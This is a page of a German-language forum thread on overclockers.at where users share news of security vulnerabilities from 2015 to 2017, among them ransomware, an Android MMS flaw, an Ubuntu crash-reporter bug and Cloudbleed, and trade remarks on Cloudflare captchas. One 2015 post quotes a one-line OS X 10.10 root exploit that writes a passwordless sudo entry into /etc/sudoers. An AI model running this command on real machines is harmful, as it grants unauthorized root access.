Aktuelle Sicherheitslücken - Seite 6

Seite 6 von 57 - Forum: Applications, Apps & Drivers auf overclockers.at

URL: https://www.overclockers.at/applications/aktuelle-sicherheitsluecken_238671/page_6 - zur Vollversion wechseln!

mr.nice. schrieb am 26.06.2015 um 10:58

Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/

noir schrieb am 26.06.2015 um 13:13

naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht

mr.nice. schrieb am 01.07.2015 um 13:30

Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934

Luka schrieb am 22.07.2015 um 11:37

OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability | SektionEins GmbH

The DYLD_PRINT_TO_FILE environment variable can be used for local privilege escalation in OS X Yosemite.

Link: www.sektioneins.de

So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com

Luka schrieb am 27.07.2015 um 21:44

Android-Smartphones über Kurznachrichten angreifbar

95 Prozent aller Android-Smartphones sollen sich durch "die Mutter aller Android-Schwachstellen" attackieren lassen. Angreifer können die Geräte unbemerkt durch eine MMS-Nachricht in eine Wanze verwandeln.

Link: www.heise.de

wergor schrieb am 20.12.2016 um 14:40

Reliably compromising Ubuntu desktops by attacking the crash reporter

In this post I’ll describe how I found a remote code execution bug in Ubuntu Desktop which affects all default installations >= 12.10 (Quantal). The bug allows for reliable code injection …

Link: donncha.is

Lord Wyrm schrieb am 24.02.2017 um 11:37

Cloudbleed

Ein T-Shirt als Bug Bounty - Speicherleck: Cloudflare verteilt private Daten übers Internet - Golem.de
Durch einen Bug im HTML-Parser des CDN-Anbieters Cloudflare verteilte dieser private Nachrichten von Datingbörsen, Passwörter und interne Keys über unzählige Webseiten. - Ein T-Shirt als Bug Bounty
Link: www.golem.de

1139 - cloudflare: Cloudflare Reverse Proxies are Dumping Uninitialized Memory - project-zero - Monorail
Link: bugs.chromium.org

Incident report on memory leak caused by Cloudflare parser bug

Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge

Link: blog.cloudflare.com

GitHub - pirate/sites-using-cloudflare: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak)

sites-using-cloudflare - :broken_heart: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak)

Link: github.com

Wiedermal Zeit für nen Passwortwechsel...

Rektal schrieb am 24.02.2017 um 12:06

Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:

COLOSSUS schrieb am 24.02.2017 um 12:18

¯\_(ツ)_/¯

Obermotz schrieb am 24.02.2017 um 12:55

Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..

Smut schrieb am 24.02.2017 um 14:27

in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.

Obermotz schrieb am 24.02.2017 um 14:50

Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch ;)

wergor schrieb am 24.02.2017 um 15:37

Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.
mit tor gibts auch ständig captcha abfragen. nervt leider :(

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.
true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/

Smut schrieb am 24.02.2017 um 15:50

das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.

wergor schrieb am 24.02.2017 um 18:25

das ist mir schon klar. nervt aber trotzdem ;)



overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2025